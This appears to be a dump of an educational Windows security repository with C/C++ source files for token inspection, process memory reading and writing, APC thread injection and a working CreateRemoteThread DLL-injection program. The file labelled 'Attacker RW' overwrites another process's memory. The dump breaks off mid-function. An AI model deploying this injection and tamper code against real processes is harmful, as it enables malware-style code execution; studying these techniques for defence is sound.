6 | /// Print the details of the primary group or the security descriptors of new objects. 7 | /// 8 | /// Handle of token 9 | VOID PrintTokenPrimaryGroup(HANDLE hTok) { 10 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenPrimaryGroup); 11 | DWORD dwRetLen; 12 | 13 | PTOKEN_PRIMARY_GROUP tp = (PTOKEN_PRIMARY_GROUP)VirtualAlloc(NULL, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 14 | 15 | if (!GetTokenInformation(hTok, TokenPrimaryGroup, (LPVOID)tp, dwTokLen, &dwRetLen)) { 16 | PrintError(L"GetTokenInformation()"); 17 | return; 18 | } 19 | 20 | std::wcout << "[+] Token Primary Group: " << std::endl; 21 | 22 | LPWSTR lpSid = SIDSerialize(tp->PrimaryGroup); 23 | if (lpSid == nullptr) { 24 | PrintError(L"SIDSerialize()"); 25 | } else { 26 | std::wcout << L"\tSID: " << lpSid << std::endl; 27 | } 28 | LocalFree(lpSid); 29 | lpSid = nullptr; 30 | 31 | WCHAR wAcc[MAX_PATH], wDom[MAX_PATH]; 32 | SID_NAME_USE eSidType; 33 | if (!GetDomainAccount(tp->PrimaryGroup, wAcc, wDom, &eSidType)) { 34 | PrintError(L"GetDomainAccount()"); 35 | } else { 36 | std::wcout << L"\tDomain\\Account (Type): " << wDom << L"\\" << wAcc << L" (" << GetSidType(eSidType) << L")" << std::endl; 37 | } 38 | 39 | VirtualFree(tp, 0x0, MEM_RELEASE); 40 | tp = nullptr; 41 | } -------------------------------------------------------------------------------- /Process Injection/Thread Hijacking/Thread Hijacking.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Header Files 31 | 32 | 33 | -------------------------------------------------------------------------------- /Process Injection/APC Thread Injection/process_utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | // custom typings 8 | typedef std::stack THREAD_STACK; 9 | typedef THREAD_STACK* PTHREAD_STACK; 10 | 11 | /// 12 | /// Get a vector of handles of the threads of the process using CreateToolhelp32Snapshot 13 | /// 14 | /// PID of the onwer process 15 | /// 16 | PTHREAD_STACK GetProcessThreads(DWORD dwPID) { 17 | // create snapshot of all the threads 18 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0x0); 19 | if (hSnapshot == INVALID_HANDLE_VALUE) { 20 | return nullptr; 21 | } 22 | 23 | // init thread entry struct and get the first entry 24 | THREADENTRY32 te; 25 | te.dwSize = sizeof(THREADENTRY32); 26 | if (!Thread32First(hSnapshot, &te)) { 27 | CloseHandle(hSnapshot); 28 | return nullptr; 29 | } 30 | 31 | HANDLE hThread = NULL; 32 | 33 | PTHREAD_STACK lpThreads = new THREAD_STACK(); 34 | do { 35 | // if the thread owner id is of the process id provided in cli args 36 | // open thread handle and push ot the vector 37 | if (te.th32OwnerProcessID == dwPID) { 38 | hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, te.th32ThreadID); 39 | if (hThread != NULL) { 40 | lpThreads->push(&hThread); 41 | } 42 | } 43 | } while (Thread32Next(hSnapshot, &te)); 44 | 45 | return lpThreads; 46 | } 47 | -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenOwner.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "ErrorHandling.h" 3 | #include "Utils.h" 4 | 5 | /// 6 | /// The process can be started by another user from the image owned by different user. The TOKEN_OWNER will provide the details of new objects created by the user running the process 7 | /// 8 | /// HANDLE of token 9 | VOID PrintTokenOwner(HANDLE hTok) { 10 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenOwner); 11 | DWORD dwRetLen; 12 | 13 | PTOKEN_OWNER to = (PTOKEN_OWNER)VirtualAlloc(NULL, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 14 | 15 | if (!GetTokenInformation(hTok, TokenOwner, (LPVOID)to, dwTokLen, &dwRetLen)) { 16 | PrintError(L"GetTokenInformation()"); 17 | return; 18 | } 19 | 20 | std::wcout << "[+] Token Owner: " << std::endl; 21 | 22 | LPWSTR lpSid = SIDSerialize(to->Owner); 23 | if (lpSid == nullptr) { 24 | PrintError(L"SIDSerialize()"); 25 | } else { 26 | std::wcout << L"\tSID: " << lpSid << std::endl; 27 | } 28 | LocalFree(lpSid); 29 | lpSid = nullptr; 30 | 31 | WCHAR wAcc[MAX_PATH], wDom[MAX_PATH]; 32 | SID_NAME_USE eSidType; 33 | if (!GetDomainAccount(to->Owner, wAcc, wDom, &eSidType)) { 34 | PrintError(L"GetDomainAccount()"); 35 | } else { 36 | std::wcout << L"\tDomain\\Account (Type): " << wDom << L"\\" << wAcc << L" (" << GetSidType(eSidType) << L")" << std::endl; 37 | } 38 | 39 | VirtualFree(to, 0x0, MEM_RELEASE); 40 | to = nullptr; 41 | } -------------------------------------------------------------------------------- /Process ReadWrite/Victim Process/Source.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | INT main(DWORD argc, PCHAR argv[]) { 5 | if (argc < 2) { 6 | std::cerr << "Usage: " << argv[0] << " " << std::endl; 7 | return 0x1; 8 | } 9 | SIZE_T txtLen = strlen(argv[1]); 10 | 11 | std::cout << "Process ID: " << GetCurrentProcessId() << std::endl; 12 | 13 | LPSTR lpBuff = (LPSTR)VirtualAlloc(nullptr, txtLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 14 | CopyMemory(lpBuff, argv[1], txtLen); 15 | 16 | std::cout << "=====================================\n"; 17 | std::cout << " Variables before Tamper \n"; 18 | std::cout << "=====================================\n\n"; 19 | std::cout << "Argument address: 0x" << std::hex << (PVOID)argv[1] << "\t\t\tArgument Value: " << argv[1] << std::endl; 20 | std::cout << "Buffer address: 0x" << std::hex << (PVOID)lpBuff << "\t\t\tBuffer Value: " << lpBuff << std::endl; 21 | std::cout << "Length of Chars: " << std::dec << txtLen << std::endl; 22 | 23 | system("pause"); 24 | 25 | std::cout << "=====================================\n"; 26 | std::cout << " Variables after Tamper \n"; 27 | std::cout << "=====================================\n\n"; 28 | std::cout << "Argument address: 0x" << std::hex << (PVOID)argv[1] << "\t\t\tArgument Value: " << argv[1] << std::endl; 29 | std::cout << "Buffer address: 0x" << std::hex << (PVOID)lpBuff << "\t\t\tBuffer Value: " << lpBuff << std::endl; 30 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.31919.166 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Token Dump", "Token Dump\Token Dump.vcxproj", "{B1758CBF-2263-412F-9E00-1B27F953EB0B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Debug|x64.ActiveCfg = Debug|x64 17 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Debug|x64.Build.0 = Debug|x64 18 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Debug|x86.ActiveCfg = Debug|Win32 19 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Debug|x86.Build.0 = Debug|Win32 20 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Release|x64.ActiveCfg = Release|x64 21 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Release|x64.Build.0 = Release|x64 22 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Release|x86.ActiveCfg = Release|Win32 23 | {B1758CBF-2263-412F-9E00-1B27F953EB0B}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {A08D5E80-2D4E-4C61-8299-517FDEAB3E19} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenGroup.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "ErrorHandling.h" 3 | #include "Utils.h" 4 | #include 5 | 6 | /// 7 | /// Print the list of the groups 8 | /// 9 | /// 10 | VOID PrintTokenGroup(HANDLE hTok) { 11 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenGroups); 12 | DWORD dwRetLen; 13 | 14 | PTOKEN_GROUPS tg = (PTOKEN_GROUPS)VirtualAlloc(NULL, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 15 | 16 | if (!GetTokenInformation(hTok, TokenGroups, (LPVOID)tg, dwTokLen, &dwRetLen)) { 17 | PrintError(L"GetTokenInformation()"); 18 | return; 19 | } 20 | 21 | std::wcout << L"[+] Groups" << std::endl; 22 | for (DWORD c = 0;c < tg->GroupCount;c++) { 23 | std::wcout << L"\t[" << std::setw(2) << c + 1 << L"] "; 24 | 25 | // Get the SID string for SID pointer 26 | LPWSTR lpSid = SIDSerialize(tg->Groups[c].Sid); 27 | if (lpSid == nullptr) { 28 | PrintError(L"SIDSerialize()"); 29 | } else { 30 | std::wcout << L"SID: " << lpSid << std::endl; 31 | } 32 | LocalFree(lpSid); 33 | lpSid = nullptr; 34 | 35 | // Get the account name, domain name and its type from the SID value 36 | WCHAR wAcc[MAX_PATH], wDom[MAX_PATH]; 37 | SID_NAME_USE eSidType; 38 | if (!GetDomainAccount(tg->Groups[c].Sid, wAcc, wDom, &eSidType)) { 39 | PrintError(L"GetDomainAccount()"); 40 | } else { 41 | std::wcout << L"\t Domain\\Account (Type): " << wDom << L"\\" << wAcc << L" (" << GetSidType(eSidType) << L")" << std::endl; 42 | } 43 | } 44 | 45 | VirtualFree(tg, 0x0, MEM_RELEASE); 46 | tg = nullptr; 47 | } -------------------------------------------------------------------------------- /Process ReadWrite/Attacker RW/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | int main(DWORD argc, LPCSTR argv[]) { 4 | if (argc < 4) { 5 | std::cerr << "Usage: " << argv[0] << " []\n"; 6 | return 0x1; 7 | } 8 | 9 | DWORD dwPages = argc == 5 ? atoll(argv[4]) : 1; // number of pages to fetch 10 | DWORD dwPID = atoll(argv[1]); 11 | 12 | // convert the hex address to long long (decimal base) 13 | LONGLONG llBaseAddr; 14 | if (!StrToInt64ExA(argv[2], STIF_SUPPORT_HEX, &llBaseAddr)) { 15 | PrintError("StrToInt64ExA()", TRUE); 16 | } 17 | 18 | // get the process handle with VM read/write permissions 19 | HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPID); 20 | if (hProcess == NULL) { 21 | PrintError("OpenProcess()", TRUE); 22 | } 23 | 24 | // read the buffer from the remote process and store in the local buffer 25 | LPVOID lpReadBuffer = (LPVOID)VirtualAlloc(nullptr, PAGE_SIZE * dwPages, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 26 | if (lpReadBuffer == nullptr) { 27 | PrintError("VirtualAlloc()", TRUE); 28 | } 29 | 30 | if (!ReadProcessMemory(hProcess, (LPVOID)llBaseAddr, lpReadBuffer, PAGE_SIZE * dwPages, nullptr)) { 31 | PrintError("ReadProcessMemory()", TRUE); 32 | } else { 33 | std::cout << "Read Buffer: " << (LPSTR)lpReadBuffer << std::endl; 34 | } 35 | 36 | // write into process memory 37 | if (!WriteProcessMemory(hProcess, (LPVOID)llBaseAddr, argv[3], strlen(argv[3]) + 1, nullptr)) { 38 | PrintError("WriteProcessMemory()", TRUE); 39 | } 40 | 41 | std::cout << "Memory tamper succeeded!" << std::endl; 42 | } -------------------------------------------------------------------------------- /Process Listing/NT Query System Api/pch.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #pragma comment(lib, "Ntdll.lib") 9 | #pragma comment(lib, "Shlwapi.lib") 10 | 11 | // NTSTATUS return codes specifically for NtQuerySystemInformation 12 | constexpr unsigned int STATUS_SUCCESS = 0x0; 13 | constexpr unsigned int STATUS_INFO_LENGTH_MISMATCH = 0x0C0000004; 14 | 15 | // Signature of NtQuerySystemInformation from winternl.h 16 | // Placeholders IN and OUT are defined to nothing, this is just for developers to know how the parameters will be used 17 | EXTERN_C NTSTATUS NTAPI NtQuerySystemInformation( 18 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 19 | OUT PVOID SystemInformation, 20 | IN ULONG SystemInformationLength, 21 | OUT PULONG ReturnLength OPTIONAL 22 | ); 23 | 24 | /// 25 | /// Convert bytes to human-readable format using StrFormatByteSizeW from Shlwapi.lib 26 | /// 27 | /// Note: In Windows 10, size is reported in base 10 rather than base 2. For example, 1 KB is 1000 bytes rather than 1024. 28 | /// 29 | /// Numertic type which will be then converted to LONGLONG 30 | /// Size in bytes 31 | /// Constant wide string containg the human-readable size buffer 32 | template 33 | LPCWSTR GetHumanReadableSize(T size) { 34 | LPCWSTR lpSize = (LPCWSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 35 | 36 | if (StrFormatByteSizeW((LONGLONG)size, (PWSTR)lpSize, MAX_PATH) == NULL) { 37 | VirtualFree((LPVOID)lpSize, 0x0, MEM_RELEASE); 38 | lpSize = nullptr; 39 | } 40 | 41 | return lpSize; 42 | } 43 | -------------------------------------------------------------------------------- /Token Dump/Token Dump/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | INT wmain(DWORD argc, PCWSTR* argv) { 4 | if (argc < 2) { 5 | std::wcout << L"Usage: \"" << argv[0] << L"\" " << std::endl; 6 | return 0x1; 7 | } 8 | DWORD dwPID = _wtol(argv[1]); 9 | 10 | // Try adding SeDebugPrivileges or continue unprivileged process 11 | if (!AddSeDebugPrivileges()) { 12 | PrintError(L"AddSeDebugPrivileges()"); 13 | } 14 | 15 | 16 | // Open process token with QUERY_INFORMATION 17 | HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPID); 18 | if (hProc == NULL || hProc == INVALID_HANDLE_VALUE) { 19 | // In case of protected process, open token to query limited information 20 | hProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, dwPID); 21 | if (hProc == NULL || hProc == INVALID_HANDLE_VALUE) { 22 | PrintError(L"OpenProcess()", FALSE); 23 | } 24 | } 25 | 26 | // Print basic process details 27 | PrintBasicProcessDetails(dwPID); 28 | 29 | // Open the process token with the process handle to query basic information and its source 30 | HANDLE hTok; 31 | if (!OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_QUERY_SOURCE, &hTok)) { 32 | PrintError(L"OpenProcessToken()", TRUE); 33 | } 34 | 35 | // Print all the token information 36 | PrintTokenSessionId(hTok); 37 | PrintTokenStatistics(hTok); 38 | PrintTokenUser(hTok); 39 | PrintTokenGroup(hTok); 40 | PrintTokenPrivilege(hTok); 41 | PrintTokenOwner(hTok); 42 | PrintTokenPrimaryGroup(hTok); 43 | PrintTokenSource(hTok); 44 | PrintTokenType(hTok); 45 | PrintTokenElevation(hTok); 46 | PrintTokenIsRestricted(hTok); 47 | PrintTokenSandboxInert(hTok); 48 | 49 | // Close handlers and release memory 50 | CloseHandle(hProc); 51 | CloseHandle(hTok); 52 | hProc = nullptr; 53 | hTok = nullptr; 54 | } 55 | -------------------------------------------------------------------------------- /Process Injection/AlertableSleep/Source.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | /// 6 | /// Simple thread function to call the sleepex 7 | /// 8 | VOID HelloThread(VOID) { 9 | _tprintf(_T("[%d] Thread is going to sleep for 5000 millisecs\n"), GetCurrentThreadId()); 10 | 11 | // SleepEx will either be completed when a single APC is executed or it gets timed out 12 | if (SleepEx(5000, TRUE) != WAIT_IO_COMPLETION) { 13 | _tprintf(_T("[%d] Timed outs\n"), GetLastError()); 14 | } 15 | 16 | _tprintf(_T("[%d] Resuming thread\n"), GetCurrentThreadId()); 17 | 18 | } 19 | 20 | /// 21 | /// Callback function that will be run from the thread apc queue 22 | /// 23 | /// Parameter to hold thread of the APC 24 | VOID Callback(ULONG_PTR dThread) { 25 | _tprintf(_T("[%d APC] Callback invoked!\n"), (DWORD)dThread); 26 | } 27 | 28 | INT _tmain(INT argc, TCHAR argv[]) { 29 | 30 | // create a thread with HelloThread routine 31 | DWORD dThreadId; 32 | HANDLE hThread = CreateThread(NULL, 0x0, (LPTHREAD_START_ROUTINE)HelloThread, NULL, 0x0, &dThreadId); 33 | if (hThread == NULL) { 34 | _tprintf(_T("[%d] Thread creation failed!\n"), GetLastError()); 35 | return 0x1; 36 | } 37 | 38 | _tprintf(_T("Continue main function, about add callback to apc queue!\n")); 39 | 40 | Sleep(4999); // increase time (same as sleep of the thread) and the thread sleepex will timeout 41 | 42 | // Add the callback apc to the hThread 43 | if (!QueueUserAPC((PAPCFUNC)Callback, hThread, (ULONG_PTR)dThreadId)) { 44 | _tprintf(_T("[%d] APC not called\n"), GetLastError()); 45 | CloseHandle(hThread); 46 | return 0x1; 47 | } 48 | 49 | 50 | // Free resources and exit 51 | CloseHandle(hThread); 52 | hThread = NULL; 53 | 54 | return 0x0; 55 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenElevation.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Utils.h" 4 | #include "ErrorHandling.h" 5 | 6 | /// 7 | /// Get the token elevation details of the token process. This will be different for different process 8 | /// 9 | /// HANDLE of the token 10 | VOID PrintTokenElevation(HANDLE hTok) { 11 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenElevation); 12 | DWORD dwRetLen; 13 | 14 | PTOKEN_ELEVATION te = (PTOKEN_ELEVATION)VirtualAlloc(nullptr, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 15 | if (!GetTokenInformation(hTok, TokenElevation, (LPVOID)te, dwTokLen, &dwRetLen)) { 16 | PrintError(L"GetTokenInformation()"); 17 | return; 18 | } 19 | 20 | std::wcout << L"[+] Token Elevation" << std::endl; 21 | if (te->TokenIsElevated) { 22 | // If the process is elevated, then get the elevation type 23 | std::wcout << "\tStatus: Elevated" << std::endl; 24 | dwTokLen = GetTokenInfoLength(hTok, TokenElevationType); 25 | 26 | PTOKEN_ELEVATION_TYPE t = (PTOKEN_ELEVATION_TYPE)VirtualAlloc(nullptr, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 27 | if (!GetTokenInformation(hTok, TokenElevationType, (LPVOID)t, dwTokLen, &dwRetLen)) { 28 | PrintError(L"GetTokenInformation()"); 29 | } else { 30 | switch (*t) { 31 | case TokenElevationTypeDefault: 32 | std::wcout << "\tType: Default - The token does not have a linked token\n"; 33 | break; 34 | case TokenElevationTypeFull: 35 | std::wcout << "\tType: Full - The token is an elevated token\n"; 36 | break; 37 | case TokenElevationTypeLimited: 38 | std::wcout << "\tType: Limited - The token is a limited token\n"; 39 | break; 40 | default: 41 | break; 42 | } 43 | } 44 | VirtualFree(t, 0x0, MEM_RELEASE); 45 | t = nullptr; 46 | } else { 47 | std::wcout << "\tStatus: Not Elevated" << std::endl; 48 | } 49 | 50 | VirtualFree(te, 0x0, MEM_RELEASE); 51 | te = nullptr; 52 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenType.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Utils.h" 4 | #include "ErrorHandling.h" 5 | 6 | /// 7 | /// Print whether the token is primary or impersonated. If it is impersonated, then also print the level of its impersonation 8 | /// 9 | /// HANDLE of the token 10 | VOID PrintTokenType(HANDLE hTok) { 11 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenType); 12 | DWORD dwRetLen; 13 | 14 | PTOKEN_TYPE t = (PTOKEN_TYPE)VirtualAlloc(nullptr, dwTokLen, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 15 | PSECURITY_IMPERSONATION_LEVEL il = (PSECURITY_IMPERSONATION_LEVEL)VirtualAlloc(nullptr, dwTokLen, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 16 | 17 | if (!GetTokenInformation(hTok, TokenType, (LPVOID)t, dwTokLen, &dwRetLen)) { 18 | PrintError(L"GetTokenInformation()"); 19 | return; 20 | } 21 | 22 | std::wcout << L"[+] Token Type: "; 23 | 24 | switch (*t) { 25 | case TokenPrimary: 26 | std::wcout << L"Primary\n"; 27 | break; 28 | case TokenImpersonation: 29 | std::wcout << L"Impersonate\n"; 30 | // If it's an impersonation token, then print the level of impersonation 31 | dwTokLen = GetTokenInfoLength(hTok, TokenImpersonationLevel); 32 | if (!GetTokenInformation(hTok, TokenImpersonationLevel, (LPVOID)il, dwTokLen, &dwRetLen)) { 33 | PrintError(L"GetTokenInformation()"); 34 | } else { 35 | std::wcout << "[+] Impersonation Level: "; 36 | switch (*il) { 37 | case SecurityAnonymous: 38 | std::wcout << L"Anonymous - Cannot obtain identification information about the client\n"; 39 | break; 40 | case SecurityIdentification: 41 | std::wcout << L"Identification - Can obtain information about the client, but not impersonate it\n"; 42 | break; 43 | case SecurityImpersonation: 44 | std::wcout << L"Impersonation - Can impersonate the client's security context on its local system\n"; 45 | break; 46 | case SecurityDelegation: 47 | std::wcout << L"Delegation - Can impersonate the client's security context on remote systems\n"; 48 | break; 49 | default: 50 | std::wcout << L"N/A\n"; 51 | break; 52 | } 53 | } 54 | break; 55 | default: 56 | std::wcout << L"N/A\n"; 57 | } 58 | 59 | VirtualFree(t, 0x0, MEM_RELEASE); 60 | t = nullptr; 61 | VirtualFree(il, 0x0, MEM_RELEASE); 62 | il = nullptr; 63 | } -------------------------------------------------------------------------------- /Process Injection/CreateRemoteThread DLL/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | INT main(INT argc, LPSTR argv[]) { 4 | if (argc < 3) { 5 | std::cerr << "Usage: " << argv[0] << " PID /path/to/dll\n"; 6 | return 0x1; 7 | } 8 | 9 | DWORD dwPID = atoll(argv[1]); 10 | 11 | // Permission PROCESS_VM_WRITE | PROCESS_VM_OPERATION are specifically for VirtualAlloc and WriteProcessMemory for the DLL Path 12 | // PROCESS_CREATE_THREAD is used for CreateRemoteThread function to work. 13 | HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, dwPID); 14 | if (hProcess == NULL) { 15 | PrintError("OpenProcess()", TRUE); 16 | return 0x1; 17 | } 18 | 19 | LPVOID lpBaseAddress = VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 20 | if (lpBaseAddress == nullptr) { 21 | PrintError("VirtualAllocEx()", TRUE); 22 | return 0x0; 23 | } 24 | 25 | if (!WriteProcessMemory(hProcess, lpBaseAddress, (LPCVOID)argv[2], strlen(argv[2]), nullptr)) { 26 | PrintError("WriteProcessMemory()", TRUE); 27 | } 28 | 29 | // Kernel32 is ASLRed while booting and is then address is shared by all the processes 30 | HMODULE hKernel32 = GetModuleHandleA("Kernel32"); 31 | if (hKernel32 == NULL) { 32 | VirtualFreeEx(hProcess, lpBaseAddress, 0x0, MEM_RELEASE); 33 | lpBaseAddress = nullptr; 34 | 35 | CloseHandle(hProcess); 36 | hProcess = NULL; 37 | 38 | PrintError("GetModuleHandleA()", TRUE); 39 | return 0x0; 40 | } 41 | FARPROC pLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA"); 42 | 43 | // Inherit the security attributes from the parent process (helps in getting privileges of that) with default stack size 44 | // Creation flag 0x0 means that thread will be started immediately and no thread ID is returned 45 | HANDLE hThread = CreateRemoteThread(hProcess, nullptr, NULL, (LPTHREAD_START_ROUTINE)pLoadLibraryA, lpBaseAddress, NULL, nullptr); 46 | if (hThread == NULL) { 47 | VirtualFreeEx(hProcess, lpBaseAddress, 0x0, MEM_RELEASE); 48 | lpBaseAddress = nullptr; 49 | 50 | CloseHandle(hProcess); 51 | hProcess = NULL; 52 | 53 | PrintError("CreateRemoteThread()", TRUE); 54 | return 0x0; 55 | } 56 | 57 | std::cout << "Injected DLL\n"; 58 | 59 | 60 | CloseHandle(hProcess); 61 | CloseHandle(hThread); 62 | hProcess = hThread = nullptr; 63 | 64 | return 0x0; 65 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenStatistics.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Utils.h" 4 | #include "ErrorHandling.h" 5 | #include 6 | 7 | #pragma comment(lib, "Shlwapi.lib") 8 | 9 | /// 10 | /// 11 | /// 12 | /// 13 | VOID PrintTokenStatistics(HANDLE hTok) { 14 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenStatistics); 15 | DWORD dwRetLen; 16 | 17 | PTOKEN_STATISTICS pStats = (PTOKEN_STATISTICS)VirtualAlloc(nullptr, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 18 | 19 | if (!GetTokenInformation(hTok, TokenStatistics, (LPVOID)pStats, dwTokLen, &dwRetLen)) { 20 | PrintError(L"GetTokenInformation()", FALSE); 21 | } else { 22 | 23 | std::wcout << L"[+] Token Statistics:\n"; 24 | std::wcout << L"\tToken ID: 0x" << std::hex << std::uppercase << pStats->TokenId.HighPart << L"-" << pStats->TokenId.LowPart << std::nouppercase << std::dec << std::endl; 25 | std::wcout << L"\tAuthentication ID: 0x" << std::hex << std::uppercase << pStats->AuthenticationId.HighPart << L":" << pStats->AuthenticationId.LowPart << std::nouppercase << std::dec << std::endl; 26 | 27 | LPWSTR lpDynamicCharged = (LPWSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 28 | LPWSTR lpDynamicAvailable = (LPWSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 29 | LPWSTR lpDynamicTotal = (LPWSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 30 | StrFormatByteSize(pStats->DynamicCharged, lpDynamicCharged, MAX_PATH); 31 | StrFormatByteSize(pStats->DynamicAvailable, lpDynamicAvailable, MAX_PATH); 32 | StrFormatByteSize(pStats->DynamicCharged + pStats->DynamicCharged, lpDynamicTotal, MAX_PATH); 33 | 34 | std::wcout << L"\tMemory Usage: " << lpDynamicCharged << L" / " << lpDynamicTotal << L"\t(" << lpDynamicAvailable << L" left)" << std::endl; 35 | std::wcout << L"\tTotal Groups Count: " << pStats->GroupCount << std::endl; 36 | std::wcout << L"\tTotal Privileges Count: " << pStats->PrivilegeCount << std::endl; 37 | std::wcout << L"\tModified ID: 0x" << std::hex << std::uppercase << pStats->ModifiedId.HighPart << L"-" << pStats->ModifiedId.LowPart << std::nouppercase << std::dec << std::endl; 38 | 39 | VirtualFree(lpDynamicAvailable, 0x0, MEM_RELEASE); 40 | VirtualFree(lpDynamicCharged, 0x0, MEM_RELEASE); 41 | VirtualFree(lpDynamicTotal, 0x0, MEM_RELEASE); 42 | lpDynamicAvailable = lpDynamicCharged = lpDynamicTotal = nullptr; 43 | } 44 | 45 | VirtualFree(pStats, 0x0, MEM_RELEASE); 46 | pStats = nullptr; 47 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenPrivilege.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "ErrorHandling.h" 3 | #include "Utils.h" 4 | #include "ProcessDetails.h" 5 | #include 6 | 7 | /// 8 | /// Print the privileges associated with an access token and determines whether the privileges are enabled. 9 | /// 10 | /// HANDLE of token 11 | VOID PrintTokenPrivilege(HANDLE hTok) { 12 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenPrivileges); 13 | DWORD dwRetLen; 14 | 15 | PTOKEN_PRIVILEGES tp = (PTOKEN_PRIVILEGES)malloc(dwTokLen); // (NULL, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 16 | 17 | if (!GetTokenInformation(hTok, TokenPrivileges, (LPVOID)tp, dwTokLen, &dwRetLen)) { 18 | PrintError(L"GetTokenInformation()"); 19 | return; 20 | } 21 | 22 | std::wcout << L"[+] Token Privileges" << std::endl; 23 | 24 | for (DWORD c = 0; c < tp->PrivilegeCount; c++) { 25 | LPWSTR lpName = (LPWSTR)VirtualAlloc(NULL, 1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 26 | LPWSTR lpDisplayName = (LPWSTR)VirtualAlloc(NULL, 1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 27 | DWORD dwName, dwLangId, dwDisplayName; 28 | dwName = 